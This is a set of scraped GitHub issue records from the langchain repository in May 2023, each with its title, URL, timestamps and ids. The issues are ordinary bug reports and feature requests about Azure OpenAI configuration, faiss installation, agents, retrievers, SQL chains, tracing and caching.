### System Info langchain 171, gpt4 model in a region, text-embedding-ada002 in another ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Create an embedding on ADA002 in a region, with os.environ settings : os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_KEY"] = "" os.environ["OPENAI_API_BASE"] = "" os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview" embeddings = OpenAIEmbeddings(model="") text = "This is a test document." embeddings.embed_query(text) this works. If I try to add a LLM to do later doc retrieval, like this I got the followin exception: Create an embedding on ADA002 in a region, with os.environ settings : os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_KEY"] = "" os.environ["OPENAI_API_BASE"] = "" os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview" embeddings = OpenAIEmbeddings(model="") llm = AzureChatOpenAI( openai_api_key = "", openai_api_base = "", model_name="" ) #result = llm([HumanMessage(content="Translate this sentence from English to French. I love programming.")]) #print(result) text = "This is a test document." embeddings.embed_query(text) Exception has occurred: InvalidRequestError The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again. ### Expected behavior I should be able to have 2 distincts GPT and ADA setup not on the same API base.
Resource does not exists when using both OpenAIEmbeddings and AzureChatOpenAI in two different Azure region/ endpoints
https://api.github.com/repos/langchain-ai/langchain/issues/4819/comments
6
2023-05-16T23:36:25Z
2023-11-03T08:33:02Z
https://github.com/langchain-ai/langchain/issues/4819
1,712,871,337
4,819
[ "langchain-ai", "langchain" ]
### Discussed in https://github.com/hwchase17/langchain/discussions/4817 <div type='discussions-op-text'> <sup>Originally posted by **markanth** May 16, 2023</sup> Under Use Cases -> Code Understanding, you will find: The full tutorial is available below. [Twitter the-algorithm codebase analysis with Deep Lake](https://python.langchain.com/en/latest/use_cases/code/twitter-the-algorithm-analysis-deeplake.html): A notebook walking through how to parse github source code and run queries conversation. [LangChain codebase analysis with Deep Lake](https://python.langchain.com/en/latest/use_cases/code/code-analysis-deeplake.html): A notebook walking through how to analyze and do question answering over THIS code base. In both full tutorials, I think that this line: model = ChatOpenAI(model='gpt-3.5-turbo') # switch to 'gpt-4' should be: model = ChatOpenAI(model_name='gpt-3.5-turbo') (model_name instead of model) </div>
Typo in DeepLake Code Analysis Tutorials
https://api.github.com/repos/langchain-ai/langchain/issues/4818/comments
0
2023-05-16T22:21:09Z
2023-05-17T15:52:24Z
https://github.com/langchain-ai/langchain/issues/4818
1,712,813,069
4,818
[ "langchain-ai", "langchain" ]
### Feature request The LlamaCpp wrapper doesn't implement the get_num_tokens functions, which then defauls to a GPT2 tokenizer, and returns a wrong number of tokens ### Motivation - ### Your contribution -
Implement get_num_tokens in LlamaCpp
https://api.github.com/repos/langchain-ai/langchain/issues/4815/comments
1
2023-05-16T21:24:51Z
2023-09-10T16:17:04Z
https://github.com/langchain-ai/langchain/issues/4815
1,712,756,362
4,815
[ "langchain-ai", "langchain" ]
### System Info Just working my way through the AutoGPT instructions here https://python.langchain.com/en/latest/use_cases/autonomous_agents/autogpt.html and getting the error: --------------------------------------------------------------------------- ``` ModuleNotFoundError Traceback (most recent call last) Cell In[11], line 4 2 embeddings_model = OpenAIEmbeddings() 3 # Initialize the vectorstore as empty ----> 4 import faiss 6 embedding_size = 1536 7 index = faiss.IndexFlatL2(embedding_size) ModuleNotFoundError: No module named 'faiss' ``` Will update this ticket if I can figure it out. We already have this line further up the code: `from langchain.vectorstores import FAISS ` **Edit**: Ok so I see that there's such a thing as a pip module called faiss. However doing pip install faiss gives me: ``` ERROR: Could not find a version that satisfies the requirement faiss (from versions: none) ERROR: No matching distribution found for faiss ``` **Edit 2**: Ah ok - For windows users you have to install the CPU version of faiss. See here: https://github.com/facebookresearch/faiss/blob/main/INSTALL.md ### Who can help? ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Just follow the steps in the tutorial ### Expected behavior Not sure - perhaps it was meant to be instantiating the FAISS class?
No module named 'faiss'
https://api.github.com/repos/langchain-ai/langchain/issues/4810/comments
2
2023-05-16T19:45:26Z
2023-09-10T16:17:09Z
https://github.com/langchain-ai/langchain/issues/4810
1,712,642,408
4,810
[ "langchain-ai", "langchain" ]
### System Info Langchain version: v0.0.170 Platform: Linux/Debian python: 3.9.2 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Have an api endpoint configured such that its parameters have both query parameters and headers ![Screenshot_20230517_000552](https://github.com/hwchase17/langchain/assets/79296922/5e7c80ec-998d-4b7b-962e-9eec0f3f9cdb) ### Expected behavior Given the endpoint is something like https://example.com/api, the agent is trying to hit the endpoint in the following way https://example.com/api?Authorization=<token>&ph-org-code=<xxx>&ph-org-type=<xxx>&status=active Here Authorization, ph-org-code, ph-org-type are headers as seen in the spec but they are passed as query parameters in url. I also used RequestWrapper to wrap all the above 3 headers seperately and providing them at the time of creating the openapi agent but still the agent executor is not considering those values.
OpenAPI agent treating 'headers' as query parameters for any endpoint in the openapi spec
https://api.github.com/repos/langchain-ai/langchain/issues/4807/comments
1
2023-05-16T18:45:06Z
2023-09-10T16:17:15Z
https://github.com/langchain-ai/langchain/issues/4807
1,712,558,489
4,807
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. How can one use SelfQueryRetriever to query `datetime`, I've added a `datetime` object as string to the metadata, not sure if that is right or if we should use `timestamp`, but things got weird with this prompt: ``` I want to watch a movie rated higher than 8.5 and released today ``` ```json { "query": "", "filter": "and(gt(\"rating\", 8.5), eq(\"released\", \"today\"))" } ``` I'm not sure how to instruct langchain to convert today to a datetime/str. Is there a from/to AttributeInfo so we can convert when saving and loading from the vectorstore? Long story short, how would you guys approach this scenario? Thanks in advance. ### Suggestion: _No response_
Question: How to use datetime type with SelfQueryRetriever
https://api.github.com/repos/langchain-ai/langchain/issues/4801/comments
4
2023-05-16T17:49:50Z
2023-11-10T19:38:14Z
https://github.com/langchain-ai/langchain/issues/4801
1,712,469,831
4,801
[ "langchain-ai", "langchain" ]
### Feature request `langchain.llms.LlamaCpp` wraps around `llama_cpp`, which recently added a `n_gpu_layers` argument. It would be great to have it in the wrapper. Current workaround: ``` llm = LlamaCpp(...) state = llm.client.__getstate__() state["n_gpu_layers"] = n_gpu_layers llm.client.__setstate__(state) ``` ### Motivation - ### Your contribution -
Add `n_gpu_layers` arg to langchain.llms.LlamaCpp
https://api.github.com/repos/langchain-ai/langchain/issues/4797/comments
1
2023-05-16T16:16:25Z
2023-05-16T16:18:38Z
https://github.com/langchain-ai/langchain/issues/4797
1,712,335,442
4,797
[ "langchain-ai", "langchain" ]
### Feature request I propose a tool that can extract the content of each section from one `.tex` file or a latex project with multiple `.tex` files. Moreover, the tool is able to filter the unrequired contents like figure blocks, labels and comments and output the resulting contents in the form of a python dict as `{<section name>: <content>}`. With this tool, we can extract only the "introduction", "related works" and "conclusion" part of a paper and shorten the contents by filtering, which is beneficial for effective summary. We can do the same thing to pdf files with no bookmarks based on [science-parse](https://github.com/allenai/science-parse), which can be set up as a docker server and we will only need an API to use it. It takes pdf as input and outputs the metadata and the division of sections in json form. So I propose an API wrapper for that in order to make use of this powerful tool. ### Motivation The original `langchain.text_splitter.LatexTextSplitter` cannot handle multiple .tex files, while it cannot filter some contents that are not required for text analysis, like comments or figure blocks. Since many source files we download from arxiv.org will be a compressed project that has multiple `.tex` files with a `main.tex` that can link them together, we need a way to deal with them. Moreover, when dealing with the source files, some latex blocks are not necessary for text analysis, like figures and comments. By filtering them, we can shorten the contents and reduce the work of LLMs. Moreover, when loading pdf with no bookmarks, we cannot seperate sections of them and be forced to use all of them at once. This may not be efficient when it comes to scenarios like `summarization`. So we may need to have a tool that can divide the pdf file without prior input like bookmarks. ### Your contribution I want to create a PR for [document_loaders](https://github.com/hwchase17/langchain/tree/master/langchain/document_loaders) so there can be a way to load a latex project downloaded from arxiv.org in the form of `tar.gz` or`zip` . Then I want to create a PR for [text_splitter](https://github.com/hwchase17/langchain/blob/master/langchain/text_splitter.py) so I can implement the filtering and extraction for the latex file(s) I obtain from the `document_loaders`. I also want to create an API wrapper for science-parse in the same file which can takes the pdf files as input directly by `pathlib.Path` in the `text_splitter` as another splitting function.
A tool that can extract and divide sections from one or more .tex and pdf files
https://api.github.com/repos/langchain-ai/langchain/issues/4792/comments
1
2023-05-16T15:34:27Z
2023-09-17T17:17:55Z
https://github.com/langchain-ai/langchain/issues/4792
1,712,267,546
4,792
[ "langchain-ai", "langchain" ]
### Feature request When you call `add_texts` and `add_docuemnts` methods from a Weaviate instance, it always generate UUIDs for you, which is a neat feature https://github.com/hwchase17/langchain/blob/bee136efa4393219302208a1a458d32129f5d539/langchain/vectorstores/weaviate.py#L137 However, there are specific use cases where you want to generate UUIDs by yourself and pass them via `add_texts` and `add_docuemnts`. Therefore, I'd like to support `uuids` field in `kwargs` argument to these methods, and use those values instead of generating new ones inside those methods. ### Motivation Both `add_texts` and `add_documents` methods internally call [batch.add_data_object](https://weaviate-python-client.readthedocs.io/en/stable/weaviate.batch.html#weaviate.batch.Batch.add_data_object) method of a Weaviate client. The document states as below: > Add one object to this batch. NOTE: If the UUID of one of the objects already exists then the existing object will be replaced by the new object. This behavior is extremely useful when you need to update and delete document from a known field of the document. First of all, Weaviate expects UUIDv3 and UUIDv5 as UUID formats. You can find the information below: https://weaviate.io/developers/weaviate/more-resources/faq#q-are-there-restrictions-on-uuid-formatting-do-i-have-to-adhere-to-any-standards And UUIDv5 allows you to generate always the same value based on input string, as if it's a hash algorithm. https://docs.python.org/2/library/uuid.html Let's say you have unique identifier of the document, and use it to generate your own UUID. This way you can directly update, delete or replace documents without searching the documents by metadata. This will saves your time, your code, and network bandwidth and computer resources. ### Your contribution I'm attempting to make a PR,
Accept UUID list as an argument to add texts and documents into Weaviate vectorstore
https://api.github.com/repos/langchain-ai/langchain/issues/4791/comments
0
2023-05-16T15:31:48Z
2023-05-16T22:26:48Z
https://github.com/langchain-ai/langchain/issues/4791
1,712,263,240
4,791
[ "langchain-ai", "langchain" ]
### System Info I ran the below code `output = agent.run("what is Grass Type which pokemnon has highest speed and lowest speed?")` The above code gave the below output ``` > Entering new AgentExecutor chain... Thought: I need to find the pokemon with the highest and lowest speed that are of type Grass Action: python_repl_ast Action Input: df[df['Type 1'] == 'Grass'][['Name', 'Speed']].sort_values('Speed') Observation: Name Speed 658 Ferroseed 10 651 Foongus 15 659 Ferrothorn 20 207 Sunflora 30 511 AbomasnowMega Abomasnow 30 .. ... ... 556 Serperior 113 607 Whimsicott 116 274 Sceptile 120 551 ShayminSky Forme 127 275 SceptileMega Sceptile 145 [70 rows x 2 columns] Thought: I now know the pokemon with the highest and lowest speed that are of type Grass Final Answer: The Grass Type pokemon with the highest speed is SceptileMega Sceptile with 145 speed, and the Grass Type pokemon with the lowest speed is Ferroseed with 10 speed. > Finished chain. ``` But I don't need the complete output. I only need text which is after Final Answer: i.e. The Grass Type pokemon with the highest speed is SceptileMega Sceptile with 145 speed, and the Grass Type pokemon with the lowest speed is Ferroseed with 10 speed. How to get this output? Any ideas? ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction output = agent.run("what is Grass Type which pokemnon has highest speed and lowest speed?" ### Expected behavior I'm just looking to filter out the output content.
How to return the text which is after Finished Chain or Final Answer?
https://api.github.com/repos/langchain-ai/langchain/issues/4783/comments
13
2023-05-16T13:31:55Z
2024-02-14T03:35:22Z
https://github.com/langchain-ai/langchain/issues/4783
1,712,039,344
4,783
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi guys, it is my understanding that for GPT4 we have to use the ChatOpenAI api. Due to the more restrictive rate limit for GPT4 the use of map_reduce chains seems very limited. ### Suggestion: Provide a configurable batch_size - like in #1073 - for the ChatOpenAI api
ChatOpenAI: Number of parallel jobs in the MapReduce chain
https://api.github.com/repos/langchain-ai/langchain/issues/4782/comments
2
2023-05-16T13:29:08Z
2023-10-16T14:08:56Z
https://github.com/langchain-ai/langchain/issues/4782
1,712,034,290
4,782
[ "langchain-ai", "langchain" ]
### Feature request Add GPT4All chat model integration to Langchain ### Motivation I am building a chat-bot using langchain and the openAI Chat model. However I have seen that langchain added around the 0.0.130 version the integration with GPT4All to use it as a LLM provider. I would like to know if there is any intention to add Gpt4All Chat Model to langchain in a near future. I would like to build the chat-bot using LLMs stored locally. ### Your contribution I have been going through all commits in order to upgrade from my local langchain version to the new one so I might be able to help a little bit if needed
GPT4All Chat Model Integration
https://api.github.com/repos/langchain-ai/langchain/issues/4779/comments
6
2023-05-16T10:51:16Z
2023-12-19T00:50:53Z
https://github.com/langchain-ai/langchain/issues/4779
1,711,766,113
4,779
[ "langchain-ai", "langchain" ]
### Feature request The Airbyte loader should place some separator token between attributes from different records in the final document to help the LLM associating the right attributes with each other ### Motivation The Airbyte loaders loads data from the Airbyte local JSON destination into documents. As Airbyte's atomic unit is a record in the form of a JSON object, the Airbyte loader is stringifying these into the form of `key: value\n`. However, if there are a lot of records, the final document looks like this: Raw data ``` {"_airbyte_ab_id":"f0bcb1da-baaa-4f09-b210-68fa5747ad7c","_airbyte_emitted_at":1684226166938,"_airbyte_data":{"id":91,"make":"Pontiac","model":"Vibe","year":2006,"price":12134,"created_at":"2021-01-11T22:30:14+00:00"}} {"_airbyte_ab_id":"cde6ea19-3f93-4f7a-9042-f5836ca752ac","_airbyte_emitted_at":1684226166938,"_airbyte_data":{"id":92,"make":"Volkswagen","model":"Eos","year":2011,"price":53128,"created_at":"2021-01-12T23:25:06+00:00"}} {"_airbyte_ab_id":"dfbc15a5-bcb7-4676-8615-6341d29b21d3","_airbyte_emitted_at":1684226166939,"_airbyte_data":{"id":93,"make":"Mazda","model":"Mazdaspeed6","year":2007,"price":90902,"created_at":"2021-12-29T14:29:03+00:00"}} ``` Document: ``` id: 91 make: Pontiac model: Vibe year: 2006 price: 12134 created_at: 2021-01-11T22:30:14+00:00 id: 92 make: Volkswagen model: Eos year: 2011 price: 53128 created_at: 2021-01-12T23:25:06+00:00 id: 93 make: Mazda model: Mazdaspeed6 year: 2007 price: 90902 created_at: 2021-12-29T14:29:03+00:00 ``` Running a `RetrievalQA` on this document asking for `How much is a Volkswagen Eos?`, the final answer is `The price of a Volkswagen Eos is 12134` which is wrong (it's the price of the Pontiac right above it, but that's hard to tell from the list of attributes) Adding a separator between the records, the document would look like this: ``` id: 91 make: Pontiac model: Vibe year: 2006 price: 12134 created_at: 2021-01-11T22:30:14+00:00 -end of record- id: 92 make: Volkswagen model: Eos year: 2011 price: 53128 created_at: 2021-01-12T23:25:06+00:00 -end of record- id: 93 make: Mazda model: Mazdaspeed6 year: 2007 price: 90902 created_at: 2021-12-29T14:29:03+00:00 ``` The same chain and question now gives the final answer `The price of a Volkswagen Eos is 53128.` which is correct. Alternatively we could completely change the stringification strategy here and instead of producing key-value pairs serializing the array of records as YAML: * Simple to do as there are libs for that * Still little overhead for structural tokens (way less than JSON) * Also has record-separators (the `-` and indentation) * LLMs know how YAML works so it's probably beneficial for interpreting structure in complex nested records ### Your contribution Happy to put together a PR for this, both options explained above are simple to do.
Improve Airbyte loader to help LLM differentiate entities
https://api.github.com/repos/langchain-ai/langchain/issues/4776/comments
5
2023-05-16T08:49:32Z
2023-09-19T16:10:46Z
https://github.com/langchain-ai/langchain/issues/4776
1,711,556,396
4,776
[ "langchain-ai", "langchain" ]
### System Info langchain==0.0.169 ### Who can help? @hwchase17 @ekzh ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` import os import langchain import openai from langchain.llms import AzureOpenAI from langchain.chat_models import AzureChatOpenAI from langchain.embeddings import OpenAIEmbeddings llmconfig = { "openai_api_key": "<secret>", "openai_api_base": "https://myllm.openai.azure.com/", "deployment_name": "davinci", } chatconfig = { "model_name": "gpt-35-turbo", "openai_api_type": "azure", "openai_api_version": "chatVERSION", "openai_api_key": "<secret>", "openai_api_base": "https://mychat.openai.azure.com/", "deployment_name": "gpt-35-turbo", } embedderconfig = { "openai_api_key": "<secret>", "model": "ada", "openai_api_base": "https://myembedder.openai.azure.com/", "openai_api_version": "embedderVERSION", "deployment": "ada", } # First time llm = AzureOpenAI(**llmconfig) print(openai.api_version) chat = AzureChatOpenAI(**chatconfig) print(openai.api_version) embedder = OpenAIEmbeddings(**embedderconfig) print(openai.api_version) print("\n") # Second time llm = AzureOpenAI(**llmconfig) print(openai.api_version) chat = AzureChatOpenAI(**chatconfig) print(openai.api_version) embedder = OpenAIEmbeddings(**embedderconfig) print(openai.api_version) ``` This code will return the following: ``` None chatVERSION embedderVERSION embedderVERSION chatVERSION embedderVERSION ``` ### Expected behavior The LangChain classes should not alter the global openai module values, because this could cause conflicts when multiple classes are using those. For example if using Chat/Completion API and Embeddings API use a different `api_version` value. Or when using Chat/Completion from Azure and Embeddings from OpenAI, because the classes share the same openai global values, depending on the order of operations there will be unexpected behaviours. Related issues: #2683 #4352 Related PR: https://github.com/hwchase17/langchain/pull/4234 https://github.com/pieroit/cheshire-cat/pull/195 Related code: https://github.com/hwchase17/langchain/blob/a7af32c274860ee9174830804301491973aaee0a/langchain/chat_models/azure_openai.py#L79-L87 and https://github.com/hwchase17/langchain/blob/a7af32c274860ee9174830804301491973aaee0a/langchain/embeddings/openai.py#L166-L178
LangChain classes share openai global values
https://api.github.com/repos/langchain-ai/langchain/issues/4775/comments
14
2023-05-16T08:48:53Z
2023-06-13T18:15:13Z
https://github.com/langchain-ai/langchain/issues/4775
1,711,555,266
4,775
[ "langchain-ai", "langchain" ]
### Feature request i find this version can only support faiss-gpu, does it support faiss-gpu. maybe we can add something like annoy, hnswlib and so on ### Motivation add more embedding search tools, faiss, annoy, hnswlib ### Your contribution support more embedding search tools
this version also supprot faiss-gpu version
https://api.github.com/repos/langchain-ai/langchain/issues/4773/comments
1
2023-05-16T08:11:11Z
2023-09-10T16:17:19Z
https://github.com/langchain-ai/langchain/issues/4773
1,711,486,994
4,773
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Context: I'm trying to chat with my dataset as customer reviews from a restaurant. I would like to have LLM make a summary for every single store individually, I found it difficult to generate the expected output using any types of chains, so alternatively I preprocess my dataset before ingest. I save the reviews as one text file per store(there are around 20 stores, which means I created 20 text files per store) Then I embedded 20 files into one vectordb, code as below chain = RetrievalQAWithSourcesChain.from_chain_type( llm=model, chain_type="stuff", retriever=db.as_retriever(), chain_type_kwargs=chain_type_kwargs, reduce_k_below_max_tokens=True ) my prompt is sth like "make a summary of customer reviews per store", however only 4 stores with summary generated, I guess only 4 documents returned as context?Is there any solution with one single prompt I can indicate the LLM generate summaries for all 20 stores? thanks. ### Suggestion: _No response_
Challange when using Langchain for customer review analysis.
https://api.github.com/repos/langchain-ai/langchain/issues/4772/comments
7
2023-05-16T08:06:51Z
2023-09-19T16:10:51Z
https://github.com/langchain-ai/langchain/issues/4772
1,711,479,747
4,772
[ "langchain-ai", "langchain" ]
### System Info windows 10 ### Who can help? @vowelparrot @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I just follow the fake llm toturial: https://python.langchain.com/en/latest/modules/models/llms/examples/fake_llm.html my code is as flowing: from langchain.llms.fake import FakeListLLM from langchain.agents import load_tools from langchain.agents import initialize_agent from langchain.agents import AgentType tools = load_tools(["python_repl"]) responses=[ "Action: Python REPL\nAction Input: print(2 + 2)", "Final Answer: 4" ] llm = FakeListLLM(responses=responses) agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True) agent.run("whats 2 + 2") ### Expected behavior code works like the official toturial
KeyError: 'tools' when initialize_agent with python_repl tool
https://api.github.com/repos/langchain-ai/langchain/issues/4769/comments
6
2023-05-16T06:44:22Z
2023-09-19T16:10:56Z
https://github.com/langchain-ai/langchain/issues/4769
1,711,345,791
4,769
[ "langchain-ai", "langchain" ]
### System Info env python == 3.10.10 langchain==0.0.170 mysql==5.7 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ` db_chain = SQLDatabaseSequentialChain.from_llm(llm, db, verbose=True, return_direct=True, use_query_checker=True, return_intermediate_steps=True) with get_openai_callback() as cb: restult=db_chain("New energy vehicle sales in 2022?") print(restult) print(cb) ` Expected behavior Entering new SQLDatabaseSequentialChain chain... Table names to use: ['t_passenger_car_monthly_sales'] Entering new SQLDatabaseChain chain New energy vehicle sales in 2022? SQLQuery:The original query seems correct and does not contain any of the common mistakes listed. Therefore, the original query is: SELECT SUM(monthly_retail_sales) AS total_sales FROM t_passenger_car_monthly_sales WHERE passenger_car_type = 'passenger_car' AND yearly = 2022 --------------------------------------------------------------------------- ProgrammingError Traceback (most recent call last) File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/sqlalchemy/engine/base.py:1900] in Connection._execute_context(self, dialect, constructor, statement, parameters, execution_options, *args, **kw) 1899 if not evt_handled: -> 1900 self.dialect.do_execute( 1901 cursor, statement, parameters, context 1902 ) 1904 if self._has_events or self.engine._has_events: File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/sqlalchemy/engine/default.py:736], in DefaultDialect.do_execute(self, cursor, statement, parameters, context) 735 def do_execute(self, cursor, statement, parameters, context=None): --> 736 cursor.execute(statement, parameters) File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/pymysql/cursors.py:158], in Cursor.execute(self, query, args) 156 query = self.mogrify(query, args) --> 158 result = self._query(query) 159 self._executed = query File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/pymysql/cursors.py:325] in Cursor._query(self, q) 324 self._clear_result() --> 325 conn.query(q) 326 self._do_get_result() File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/pymysql/connections.py:549], in Connection.query(self, sql, unbuffered) 548 self._execute_command(COMMAND.COM_QUERY, sql) ... ProgrammingError: (pymysql.err.ProgrammingError) (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'The original query seems correct and does not contain any of the common mistakes' at line 1") [SQL: The original query seems correct and does not contain any of the common mistakes listed. Therefore, the original query is: SELECT SUM(monthly_retail_sales) AS total_sales FROM t_passenger_car_monthly_sales WHERE passenger_car_type = 'passenger_car' AND yearly = 2022] (Background on this error at: https://sqlalche.me/e/14/f405)
The exception 'SQLDatabaseSequentialChain or SQLDatabaseChain configuration parameter use_query_checker=True' occurred.
https://api.github.com/repos/langchain-ai/langchain/issues/4768/comments
4
2023-05-16T06:26:18Z
2023-10-30T16:07:03Z
https://github.com/langchain-ai/langchain/issues/4768
1,711,325,729
4,768
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. _No response_ ### Suggestion: _No response_
Will the langchain support ChatGLM?
https://api.github.com/repos/langchain-ai/langchain/issues/4766/comments
4
2023-05-16T05:59:26Z
2023-10-17T16:07:29Z
https://github.com/langchain-ai/langchain/issues/4766
1,711,294,010
4,766
[ "langchain-ai", "langchain" ]
### System Info I just set up a local tracing server, I change the port to 8005. ![image](https://github.com/hwchase17/langchain/assets/110331827/b06d5948-1676-46b6-a8e3-3c4e01cf35e8) when I visit localhost:4173, It shows: ![image](https://github.com/hwchase17/langchain/assets/110331827/abae4119-1c2d-4470-9ba2-1986f6762e65) and the error is: ``` langchain-langchain-frontend-1 | ➜ Local: http://localhost:4173/ langchain-langchain-frontend-1 | ➜ Network: http://172.18.0.4:4173/ langchain-langchain-backend-1 | INFO: Application startup complete. langchain-langchain-backend-1 | INFO: Uvicorn running on http://0.0.0.0:8005 (Press CTRL+C to quit) langchain-langchain-frontend-1 | TypeError: fetch failed langchain-langchain-frontend-1 | at fetch (/app/node_modules/undici/index.js:105:13) langchain-langchain-frontend-1 | at process.processTicksAndRejections (node:internal/process/task_queues:95:5) langchain-langchain-frontend-1 | at async fetchData (file:///app/.svelte-kit/output/server/entries/pages/sessions/_page.server.ts.js:7:17) langchain-langchain-frontend-1 | at async file:///app/.svelte-kit/output/server/index.js:489:86 langchain-langchain-frontend-1 | at async Promise.all (index 0) langchain-langchain-frontend-1 | at async unwrap_promises (file:///app/.svelte-kit/output/server/index.js:489:9) langchain-langchain-frontend-1 | at async load_server_data (file:///app/.svelte-kit/output/server/index.js:537:25) langchain-langchain-frontend-1 | at async file:///app/.svelte-kit/output/server/index.js:1500:18 ``` ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction run ```langchain-server``` in terminal ### Expected behavior how to fix this bug?
some thing wrong with tracing
https://api.github.com/repos/langchain-ai/langchain/issues/4762/comments
2
2023-05-16T03:44:42Z
2023-06-09T10:09:26Z
https://github.com/langchain-ai/langchain/issues/4762
1,711,172,396
4,762
[ "langchain-ai", "langchain" ]
### Feature request 本地局域网网络受限,需要通过反向代理访问api.openai.com地址,请问如何修改langchain包访问chatgpt的地址为我的代理地址 ### Motivation 本地局域网网络受限,需要通过反向代理访问api.openai.com地址,请问如何修改langchain包访问chatgpt的地址为我的代理地址 ### Your contribution 我使用的项目是gpt4-pdf-chatbot-langchain
如何修改langchain包默认访问api.openai.com请求地址,我需要通过代理访问api.openai.com
https://api.github.com/repos/langchain-ai/langchain/issues/4759/comments
4
2023-05-16T01:32:10Z
2023-12-06T17:46:15Z
https://github.com/langchain-ai/langchain/issues/4759
1,711,067,591
4,759
[ "langchain-ai", "langchain" ]
### System Info langchain=0.017 python=3.9.16 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [X] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction ``` from gptcache import Cache from gptcache.manager.factory import manager_factory from gptcache.processor.pre import get_prompt from langchain.cache import GPTCache import hashlib # Avoid multiple caches using the same file, causing different llm model caches to affect each other def get_hashed_name(name): return hashlib.sha256(name.encode()).hexdigest() def init_gptcache(cache_obj: Cache, llm: str): hashed_llm = get_hashed_name(llm) cache_obj.init( pre_embedding_func=get_prompt, data_manager=manager_factory(manager="map", data_dir=f"map_cache_{hashed_llm}"), ) langchain.llm_cache = GPTCache(init_gptcache) llm("Tell me a joke") ``` ### Expected behavior import hashlib
Have resolved:GPTcache :[Errno 63] File name too long: "similar_cache_[('_type', 'openai'), ('best_of', 2), ('frequency_penalty', 0), ('logit_bias', {}), ('max_tokens', 256), ('model_name', 'text-davinci-002'), ('n', 2), ('presence_penalty', 0), ('request_timeout', None), ('stop', None), ('temperature', 0.7), ('top_p', 1)]
https://api.github.com/repos/langchain-ai/langchain/issues/4757/comments
1
2023-05-16T01:14:21Z
2023-05-19T23:35:38Z
https://github.com/langchain-ai/langchain/issues/4757
1,711,055,714
4,757
[ "langchain-ai", "langchain" ]
